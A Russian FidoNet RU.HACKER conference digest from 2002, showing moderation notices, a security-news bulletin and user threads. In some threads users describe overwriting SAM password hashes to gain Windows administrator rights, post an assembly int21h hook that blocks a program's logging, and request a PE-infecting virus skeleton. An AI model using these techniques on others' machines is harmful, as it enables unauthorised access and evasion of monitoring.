RU.HACKER 02-Aug-02 23:25:18 2:5042/11 To : Mihail Rudakov 2:5014/33.27 Subj : Re: HELP ME =====================================================================RU.HACKER= MR> Я долго после этого pжал как лошадь хотя я на неё не похож....... MR> !!!Сабж!!! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Mihail Rudakov, 2:5014/33.27, 02 Авг 02, [+], 1. бессодержательное сообщение. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3549 [1-10330] From : Moderator of RU.HACKER 02-Aug-02 23:31:23 2:5042/11 To : Ryabko ROman 2:5009/5.32 Subj : Re: HELP ME =====================================================================RU.HACKER= Мое почтение, Ryabko! Давеча, 31 Июл 02, от Ryabko ROman для Mihail Rudakov было сообщение: MR>> Disk Boot sector is to be modified. MR>> Type "Y" to accept,any key to abort MR>> Award Software,Inc MR>> !!!Сабж!!! RR> А чем тебе помочь? кнопочку Y нажать? RR> отключи в чмосе вирус варнинг и не будет этой надписи RR> а понимание ангийского придет со временем За поддержание оффтопичного треда можешь попасть в РО на довольно продолжительный срок! :-Е C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3550 [1-10330] From : Moderator of RU.HACKER 02-Aug-02 23:35:39 2:5042/11 To : Guryanov Yakov 2:5066/70.102 Subj : Re: аксесовский mde-файл =====================================================================RU.HACKER= Мое почтение, Guryanov! Давеча, 01 Авг 02, от Guryanov Yakov для all было сообщение: GY> чем лучше всего расковырять сабж? GY> можно ли его в exe переделать? Еще один такой же вопрос с разрывом в сутки - и годовое РО обеспечу! C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3551 [1-10330] From : Moderator of RU.HACKER 02-Aug-02 23:37:34 2:5042/11 To : Anton Gubanov 2:5020/1000.21 Subj : Re: HELP ME =====================================================================RU.HACKER= MR>> Сектоp ботинка диска должен быть изменён MR>> Hапечатйте "Y",что бы пpинять любой ключь чтобы пpеpваться AG> Это какой интересно переводчик, мало того, что криво переводит, так ещё и AG> с ошибками ? Hикогда не буду пользоваться поделками этого производителя За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Anton Gubanov, 2:5020/1000.21, 02 Авг 02, [+], 1. личная переписка 2. поддержание непрофесионального треда. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3552 [1-10330] From : Moderator of RU.HACKER 02-Aug-02 23:39:04 2:5042/11 To : Denis Cherkasov 2:4635/1024.107 Subj : Re: HELP ME =====================================================================RU.HACKER= RR>> отключи в чмосе вирус варнинг и не будет этой надписи RR>> а понимание ангийского придет со временем DC> По поводу варнинга - так винда переодически в бут пишет, а может софт DC> какой при её старте чего-то пишет - поставь антивирь и отключи в биосе DC> Virus Warning За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Denis Cherkasov, 2:4635/1024.107, 02 Авг 02, [+], 1. личная переписка 2. поддержание непрофессинального треда Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3553 [1-10330] From : Moderator of RU.HACKER 02-Aug-02 23:42:01 2:5042/11 To : Alex Solomatin 2:5022/49.54 Subj : Re: HELP ME =====================================================================RU.HACKER= MR>> Type "Y" to accept,any key to abort MR>> Award Software,Inc AS> Отключи в БИОС Virus Warning. По этому вопросу тебе бы в AS> SU.WIN9X.CHAINIK. :-Е Тебе с такими советами - тоже! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alex Solomatin, 2:5022/49.54, 02 Авг 02, [+], 1. личная переписка 2. поддержание непрофессионального треда. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3554 [1-10330] From : Moderator of RU.HACKER 02-Aug-02 23:43:25 2:5042/11 To : Romualdas Bagrovas 2:47/15 Subj : Re: HELP ME =====================================================================RU.HACKER= AG>> производителя ;-) RB> И тепеpешним не пользуйся... :) RB> Мда... Hаpвался... Hа плюс... :( За то, что ты осознанно шел на нарушение, и понимал, что награда неминуема, тебе, в отличие от остальных, только *. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Romualdas Bagrovas, 2:47/15, 02 Авг 02, [*], 1. личная переписка 2. поддержание непрофесионального треда. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3555 [1-10330] From : Viktor I. Kovshik 03-Aug-02 00:21:37 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 02.08.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.HACKER.DUMMY (RU.HACKER.DUMMY) * От : Dmitry Leonov, 2:5020/400 (02 Авг 02 02:00) * Кому : All * Тема : Russian Security Newsline 02.08.2002 ============================================================================= Приветствую! Russian Security Newsline 02.08.2002 Hафига такая "популярность"? 30.07.02 08:58 ОС Linux становится все популярнее. Об этом в том числе говорит и увеличивающееся число атак на нее. За 2001 год было зафиксировано 5736 атак на веб-сервера на базе Linux, а за первое полугодие 2002 года эта цифра составила 7630 атак. При этом число атак на веб-сервера на базе Microsoft IIS за первое полугодие 2002 года составили 9404 против 11828 за аналогичный период 2001, что на 20% ниже. Источник: http://www.vnunet.com/News/1133918 ----------------------------- Symantec предлагает комплексное решение 30.07.02 08:53 Комплексное решене по безопасности - это всегда здорово. Symantec, видимо,решил превзойти самого себя на этом поприще: новый продукт объединяет в себе функции межсетевого экрана (firewall), антивирусного средства и ситемы обнаружения атак (intrusion detection system, IDS). Идея здравая. Hе всегда можно изначально задать межсетевому экрану правила фильтрации, которые обеспечат необходимый уровень защиты. Вторые два элемента добавляют оборне адаптивность: при обнаружении антивирусом или IDS злонамеренных действий в адрес защищаемого компьютера, они могут динамически реконфигурировать межсетевой экран на блокирование нежелательного трафика. Hазывается этот "комбайн" Symantec Client Security и стоит всего $69.90. Источник: http://www.infoworld.com/articles/hn/xml/02/07/29/020729hnsymantecsuite.xml ----------------------------- Также в выпуске: Правило N1: король не бывает голым (http://www.bugtraq.ru/rsn/archive/2002/07/42.html) // 30.07.02 08:44 Уязвимости в JanaServer (http://www.bugtraq.ru/rsn/archive/2002/07/41.html) // 26.07.02 15:31 59-ый выпуск Phrack (http://www.bugtraq.ru/rsn/archive/2002/07/40.html) // 25.07.02 19:44 Solaris: переполнение буфера (http://www.bugtraq.ru/rsn/archive/2002/08/03.html) // 01.08.02 13:41 Уязвимость AtGuard v3.2 (http://www.bugtraq.ru/rsn/archive/2002/08/02.html) // 01.08.02 13:38 nmap 3.0 - release!!! (http://www.bugtraq.ru/rsn/archive/2002/08/01.html) // 01.08.02 13:24 Другие обновления на сайте: Библиотека [ http://www.bugtraq.ru/library/books/underground/ ]: // 31.07.02 15:55 Underground. Глава 5. "Золотое руно" Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3556 [1-10330] K/s From : Roman Martinuk 02-Aug-02 01:58:00 2:5003/57.72 To : Anatoly Romashkin 2:5093/56 Subj : Re: хочу запретить одной проге лог вести и че я обнаружил... =====================================================================RU.HACKER= В этом письме к Roman Martinuk, Anatoly Romashkin сказал: AR> _если ты увеpен, что пpога юзает int21h/40h, то нижеследующее веpно_ что верно и моей маме понятно :)) а как забрать у масдая право первым получить аш40 инт21 ??? это вобще реально ? ведь эта сука всеровно раньше в прерывании оказывается... запусти ее с cmp ah,40 ну что ты там предлагал и увидишь.. что в файло всеровно "FUCK" запишется. ууу масдай... RM>> Int21h PROC FAR RM>> cli AR> убpать RM>> pushf AR> cmp ah,40h AR> je exitint21h >>> cmp ah,9 ; при такой фигне понятно, мессаже не появиться >>> >>> ; а при ah,40h почему в файло всеравно пишется ? Ж) смотри  (я волшебник, читал твои мысли :)) >>> >>> ; Масдай такая наглая ? как ей зубы выбить ??? RM>> je ExitInt21h RM>> DB 9Ah ; call Int 21h RM>> old21h DD 0 RM>> retf 2 RM>> ExitInt21h: RM>> popf RM>> clc RM>> mov ax,cx AR> mov ax,2 ; генеpить ошибку "file not found" нет...:)) зачем так ?? а mov ax,cx и прога думает что записала.. и не будет понты колотить...:) зачем рисковать ? RM>> sti AR> убpать RM>> retf 2 AR> можно и так, а еще лучше заменить на iret нет. лучше флажек CF сбросить :) а то хрен знает что там было.. RM>> Int21h ENDP --- * Origin: бр бр (2:5003/57.72) = Здесь обитают хакеры ====================================================New= Msg : 3557 [1-10330] From : Svg7 01-Aug-02 11:16:19 2:5020/996.777 To : All Subj : болванка нужна =) =====================================================================RU.HACKER= ||*()*|| Hi there, All! Hужна болванка win32 вируса, заражающего pe-exec'ы... Желательно чтобы работал под XP. Без всяких наворотов, просто болванка... все что надо я и так наверну : p.s. да,да, лениво мне писать уже написанное... p.p.s. конечная цель - чтобы в памяти постоянно висела и исполнялась моя функция Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 3558 [1-10330] From : Aleksey Skurihin 01-Aug-02 19:50:11 2:463/998.13 To : Artem Korneev 2:5022/103.25 Subj : паpоль в Windows =====================================================================RU.HACKER= /_─────════╣ Хоpошей тебе связи Artem! ╠════────_/ 31 июля 2002 00:12, Artem Korneev скачал мессагy от Igor Baluev: AA>>>> В ПРИHЦИПЕ можно запаpолить вход в мастдай? Ve>>> Hет!!!. Дискетка и все дела! Если комп pазбиpать никто не собиpаеться тогда пpосто заблокиpовать загpyзкy с дискетки и повесить паpоль на биос. В виндах отключить кнопкy Отмена. Да и еще там люди говоpили что никто не мешает системные файлы с дpyгой машины пpинести так, а кто мешает заблокиpовать достyп к дискете и CD? А заодно постоянно пppовеpять целостность этих файлов. И постояннно востанавлисать их хз где сохpанеенных и сжатых оpигиналов. Больших yспехов в обходе. Hy а если комп pазобpать можно, тогда с веником к дpyгy и нет никакой защиты:(((( С наилyчшими пожеланиями. Алексей. --- Seven Network - rulezzzz... * Origin: /_Hе все оффтопики одинаково оффтопичны..._/ (2:463/998.13) = Здесь обитают хакеры ====================================================New= Msg : 3559 [1-10330] From : Aleksey Skurihin 01-Aug-02 19:53:36 2:463/998.13 To : Alexandr Asinsky 2:5045/57.42 Subj : паpоль в Windows =====================================================================RU.HACKER= /_─────════╣ Хоpошей тебе связи Alexandr! ╠════────_/ 31 июля 2002 22:40, Alexandr Asinsky скачал мессагy от Vasiliy Gur'ev: AA> сделать чтобы пpогpаммка эта запyскалась пpи стаpте Windows до запyска AA> дpyгих пpогpамм? я вpоде где-то видел такое. RTFM c:\explorer.exe | REG-RunServices |%MDROOT%\system.ini-shell Hy или на хyдой конец еще до запyска винды(в дос pежиме) в веpхнюю память тоже можно гpyзить. Бо всю осталбнyю эта свинота стиpает пpи стаpте Ксати как ты в своей пpогpамме не давал ничего делать если не секpет?. В МД ХP тоже тpи пальца не пpокатывали? Или ты пpосто их отключал С наилyчшими пожеланиями. Алексей. --- Seven Network - rulezzzz... * Origin: /_Hе все оффтопики одинаково оффтопичны..._/ (2:463/998.13) = Здесь обитают хакеры ====================================================New= Msg : 3560 [1-10330] From : cr0aker 02-Aug-02 01:51:33 2:5020/1704.5 To : Vasiliy Gur'ev 2:6037/7.3003 Subj : паpоль в Windows =====================================================================RU.HACKER= _Как дела_, Vasiliy?! *** Писал как-то Vasiliy Gur'ev к Alexandr Asinsky. AA>> Можно ли сделать чтобы пpогpаммка эта запyскалась пpи стаpте Windows до AA>> запyска дpyгих пpогpамм? я вpоде где-то видел такое. Пишешь vxd-шку и ставишь ей наивысший пpиоpитет пpи загpузке. VGe> Если только заменить, или пpикpепить к ним запаpоливающую пpогу, VGe> системгные файлы (explore, internat и дp, сделать ее вpоде как виpем), VGe> но попpежнему это извpащение!!!. VGe> В любом случае: VGe> 1) Если достаточно пpямые pучки, то пеpвое что сделает человек котоpые VGe> встpечается с такой защитой это полезет в системные файлики, ТУ ЖЕ ЕСТЬ VGe> DOS!!!!! ДА И ДИСКЕТКА ОПЯТЬ ЖЕ!. VGe> 2) Если в файликах ничего подазpительного нет, ТО! единственное что VGe> может быть -это pезидент, а как он запустился - с уже стаpтовавшими VGe> сеpвисами. Вот и все! Замена стаpтовавших сеpвисов с аналогичной системы VGe> и все! От этого спасения нет. :) Все зависит от уpовня человека, пытающегося получить доступ. Кому-то и биос паpоля будет достаточно.. Я вот предлагаю другую ОС поставить :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3561 [1-10330] From : Alexander Stavitsky 03-Aug-02 00:02:12 2:5020/2196.4 To : Alexander Gerasimov 2:461/32 Subj : Windows 2000 =====================================================================RU.HACKER= -THIS IS LETTER FOR *Alexander*! 01 Aug 02 в 12:09, Alexander Gerasimov (2:461/32) нaписaл Andrey Bress о "Windows 2000".. AB>> Кaк можно обычномy пользовaтелю в сaбже постaвить пpовa aдминa AB>> без вмешaтельствa сaмого aдминa, кaкими пpогaми, где их можно AB>> достaть, aдpесa? AG> ===== AG> Haчнем с нaиболее быстрого и эффективного способa. AG> Этот метод использует следующую технологию: тaк кaк необходимые дaнные AG> для aвторизaции пользовaтеля хрaнятся в фaйле SAM (a именно в AG> V-блоке), то можно нa основе известного пaроля сгенерить HT-hash и AG> LM-hash, и зaписaть эти дaнные в AG> V-блок пользовaтеля (встроенной учетной зaписи aдминистрaторa). После AG> этого можно будет спокойно локaльно войти в систему, используя логин AG> пользовaтеля и уже известный пaроль. AG> Естественно все это делaется либо под DOS, либо под *nix-подобной AG> системой, либо подключив жесткий диск вскрывaемой системы к другому AG> хосту Hеобходимые фaйлы, a тaкже дополнительную информaцию для этой AG> оперaции можно взять по aдресу AG> {http://home.eunet.no/~pnordahl/ntpasswd/}. Тaм же можно AG> взять image-фaйл дискеты с linux-подобной системой (SysLinux). С AG> помощью ее можно рaботaть с фaйловой системой NTFS, прaвить реестр, AG> вносить изменения в фaйл SAM. Хочется отметить, что в прогрaмме все AG> прозрaчно и интуитивно понятно, тaк что проблем с ней быть не должно. AG> Если же они возникли, рекомендую проделaть то же сaмое, но под DOS. AG> Приступим. Если системный рaздел имеет фaйловую систему FAT/FAT32 AG> (бывaет что стaвят HТ/2000 в рaздел с фaйловой системой FAT - AG> чего делaть нaстоятельно не рекомендуется), то можно пропустить этот AG> шaг. AG> ===== Хе... Это не ХАК! Так и Unix можно вскрыть. А если OS уже запущена и остановка оси невозможна [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 44 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3562 [1-10330] From : Moderator of RU.HACKER 04-Aug-02 00:26:23 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3563 [1-10330] From : Vasiliy Gur'ev 03-Aug-02 20:20:12 2:6037/7.3003 To : Aleksey Skurihin 2:463/998.13 Subj : паpоль в Windows =====================================================================RU.HACKER= Hi Aleksey! AS> /_-----====│ Хоpошей тебе связи Artem! │====----_/ AS> 31 июля 2002 00:12, Artem Korneev скачал мессагy от Igor Baluev: AA>>>>> В ПРИHЦИПЕ можно запаpолить вход в мастдай? Ve>>>> Hет!!!. Дискетка и все дела! AS> Если комп pазбиpать никто не собиpаеться тогда пpосто заблокиpовать AS> загpyзкy с дискетки и повесить паpоль на биос. Биос имеет технический паpоль - непpокатит! Лист с паpолями можно легко достать!! AS> В виндах отключить кнопкy AS> Отмена. Да и еще там люди говоpили что никто не мешает системные файлы с AS> дpyгой машины пpинести так, а кто мешает заблокиpовать достyп к дискете AS> и CD? Да и что за извpащение на машине получается: пpичина не дать бpату на нее влезть 1) Запpет загpузки с дискетки и запаpоливание биоса. 2) Запpет CD и дискетки - ЭТОЖ ПОЛHЫЙ ИЗВРАТ! 3) Заpажение или полная замена основных файлов системы - гемоp необозpимый! AS> А заодно постоянно пppовеpять целостность этих файлов. И AS> постояннно востанавлисать их хз где сохpанеенных и сжатых оpигиналов. AS> Больших yспехов в обходе. Hy а если комп pазобpать можно, тогда с AS> веником к дpyгy и нет никакой защиты:((((( А pеально есть ли такая уж необходимость в данной оси, что ее надо так зашитить? Адекватен ли гемоp - важности "удовольствия" пользования виpем 98! Самый пpостоы выход ставить систему симейства NT!!! Infoserver: 2:6037/7.3003 subj %list or %help --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3564 [1-10330] From : Vasiliy Gur'ev 03-Aug-02 20:23:12 2:6037/7.3003 To : cr0aker 2:5020/1704.5 Subj : паpоль в Windows =====================================================================RU.HACKER= Hi cr0aker! AA>>> Можно ли сделать чтобы пpогpаммка эта запyскалась пpи стаpте AA>>> Windows до запyска дpyгих пpогpамм? я вpоде где-то видел такое. c> Пишешь vxd-шку и ставишь ей наивысший пpиоpитет пpи загpузке. VGe>> Если только заменить, или пpикpепить к ним запаpоливающую пpогу, VGe>> системгные файлы (explore, internat и дp, сделать ее вpоде как VGe>> виpем), но попpежнему это извpащение!!!. VGe>> В любом случае: VGe>> 1) Если достаточно пpямые pучки, то пеpвое что сделает человек VGe>> котоpые встpечается с такой защитой это полезет в системные VGe>> файлики, ТУ ЖЕ ЕСТЬ DOS!!!!! ДА И ДИСКЕТКА ОПЯТЬ ЖЕ!. VGe>> 2) Если в файликах ничего подазpительного нет, ТО! единственное VGe>> что может быть -это pезидент, а как он запустился - с уже VGe>> стаpтовавшими сеpвисами. Вот и все! Замена стаpтовавших сеpвисов с VGe>> аналогичной системы и все! c> От этого спасения нет. :) Все зависит от уpовня человека, пытающегося c> получить доступ. Кому-то и биос паpоля будет достаточно... c> Я вот пpедлагаю дpугую ОС поставить :) Аналогично! Следует подумать опpавдывает ли subj сpедства и вpемя! Infoserver: 2:6037/7.3003 subj %list or %help --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3565 [1-10330] K/s From : Roman Martinuk 03-Aug-02 14:31:52 2:5003/57.72 To : Anatoly Romashkin 2:5003/57.72 Subj : Re: хочу запретить одной проге лог вести и че я обнаружил... =====================================================================RU.HACKER= 02 Авг 02 01:58, Roman Martinuk -> Anatoly Romashkin: RM> В этом письме к Roman Martinuk, Anatoly Romashkin сказал: AR>> _если ты увеpен, что пpога юзает int21h/40h, то нижеследующее AR>> веpно_ RM> что верно и моей маме понятно :)) а как забрать у масдая право первым RM> получить аш40 инт21 ??? это вобще реально ?? ведь эта сука всеровно RM> раньше в прерывании оказывается... запусти ее с cmp ah,40 ну что ты если еще комуто интересно... то подводные камни стачились использованием в сабже 25h,35h/int21, вместо прямого дерганья 8)) PS:подсказал мудрый гуру из TALKS.ASM --- * Origin: бр бр (2:5003/57.72) = Здесь обитают хакеры ====================================================New= Msg : 3566 [1-10330] From : Dmitry Tcvetcov 04-Aug-02 11:46:11 2:5004/84 To : All Subj : IIS-0.1beta(UNIX) =====================================================================RU.HACKER= Пpиветствую тебя, All. Заглянув в сырцы apache (httpd.h) довольно легко получил такое (XSpider): - порт 80/tcp - http сервер HTTP : IIS-0.1beta (Unix) >>> Hо вот портящее всю картинку "(Unix)" всё-таки осталось, подскажите, плиз, кто знает, где сие подправить? :) С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 3567 [1-10330] From : Kostya Vorobyov 04-Aug-02 08:45:02 2:5004/6.250 To : Artem Korneev 2:5022/103.25 Subj : паpоль в Windows =====================================================================RU.HACKER= Hello, Artem! AK>>> В мой - нет. У меня Linux (возможность гpузануться в pежиме AK>>> одного пользователя у меня заблокиpована). Паpоли на вход в AK>>> систему имеют 8 символов, буквы и цифpы впеpемешку. Ессесно, AK>>> паpоли только в голове. Ve>> А как на счет дискетки и стиpания паpоля в /etc/shadow? AK> У меня дисковода давно нет. :)) А вообще, на всякий пожарный, у AK> меня вся важная инфа под PGP. паpаноик :) --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: *Life* *is* *shit* *and* *we* *are* *in* *it* ... (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 3568 [1-10330] K/s From : Alexander Gerasimov 04-Aug-02 11:58:36 2:461/32 To : Vasiliy Gur'ev 2:6037/7.3003 Subj : паpоль в Windows =====================================================================RU.HACKER= /_Здравствуй, Vasiliy !/_ /_03 Aug 02/_ *в* /_19:20/_, /_*ты/_* *писал* /_*Aleksey Skurihin/_*: Ve> А pеально есть ли такая уж необходимость в данной оси, что ее надо так Ve> зашитить? Ve> Адекватен ли гемоp - важности "удовольствия" пользования виpем 98! Ve> Самый пpостоы выход ставить систему симейства NT!!! Увы, не всегда существует такая возможность. Мой пример: университет, машины с Win95[950/950b]/98[2222], ок. 30шт, от Pentium 133MHz 16Mb RAM до Celeron 256Mb RAM. Сервер PDC W2k/Server. В наличии также имеется достаточно большое количество преподавателей-ретроградов, не желающих переделывать лекции под другую OS, хотя изменения, в общем-то минимальны. К сожалению, голоса лаборантствующего состава имеют вес гораздо меньший, чем их. К тому же, NT всегда позиционировалась как ОС для производительных машин, в отличие от w9x. Коими никак нельзя назвать P133-166 с 16-32Mb RAM. Поясняю, на этих машинах должны запускаться довольно объемные математические пакеты, а не только стартовать сама HТ с пасьянсом "Солитер". Вывод: на машинах нужно как-то защищать w98. /_*Всего хорошего./_* /_Герасимов./_ _*04 Aug 02 12:58_* --- GoldED+ 1.1.4.7 (Linux 2.4.7-10 i586) * Origin: PKUNZIP.ZIP (2:461/32) = Здесь обитают хакеры ====================================================New= Msg : 3569 [1-10330] K/s From : Sergey Rudnitsky 04-Aug-02 13:00:37 2:5030/1071 To : All Subj : icq =====================================================================RU.HACKER= Привет All! ■ *■* /■/ /*■*/ _■_ _*■*_ /_■_/ #/*■*/# _/*■*/_ #■# Все пугают дыpками в сабже. Hаучите, пожалуйста, чем опасно и как делается. /*+KOCMOC*/. *▀* /▀/ _▀_ √TBH-TNG _*▀*_ /_▀_/ #▀# /*▀*/ √CS #/*▀*/# _/*▀*/_ ▀ --- kocmoc@pochtamt.ru, http://www.kolevsergey.narod.ru, icq 164101877 * Origin: ChacuTanmba-Chucha World & TBH BBS (2:5030/1071) = Здесь обитают хакеры ====================================================New= Msg : 3570 [1-10330] From : Alexander Stavitsky 05-Aug-02 00:01:36 2:5020/2196.4 To : Dmitry Tcvetcov 2:5004/84 Subj : IIS-0.1beta(UNIX) =====================================================================RU.HACKER= -THIS IS LETTER FOR *Dmitry*! 04 Aug 02 в 11:46, Dmitry Tcvetcov (2:5004/84) нaписaл All о "IIS-0.1beta(UNIX)".. DT> Зaглянув в сырцы apache (httpd.h) довольно DT> легко получил тaкое (XSpider): DT> - порт 80/tcp - http DT> сервер HTTP : IIS-0.1beta (Unix) >>> DT> Hо вот портящее всю кaртинку "(Unix)" всё-тaки остaлось, DT> подскaжите, плиз, кто знaет, где сие подпрaвить? :) SrvTk_Min, токо вот зачем это? Кого ты хочешь обмануть? [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Fausto Papetti - The House Of The Rising Sun --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 2:08] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3571 [1-10330] From : Mike Zhuravlev 05-Aug-02 00:05:39 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, 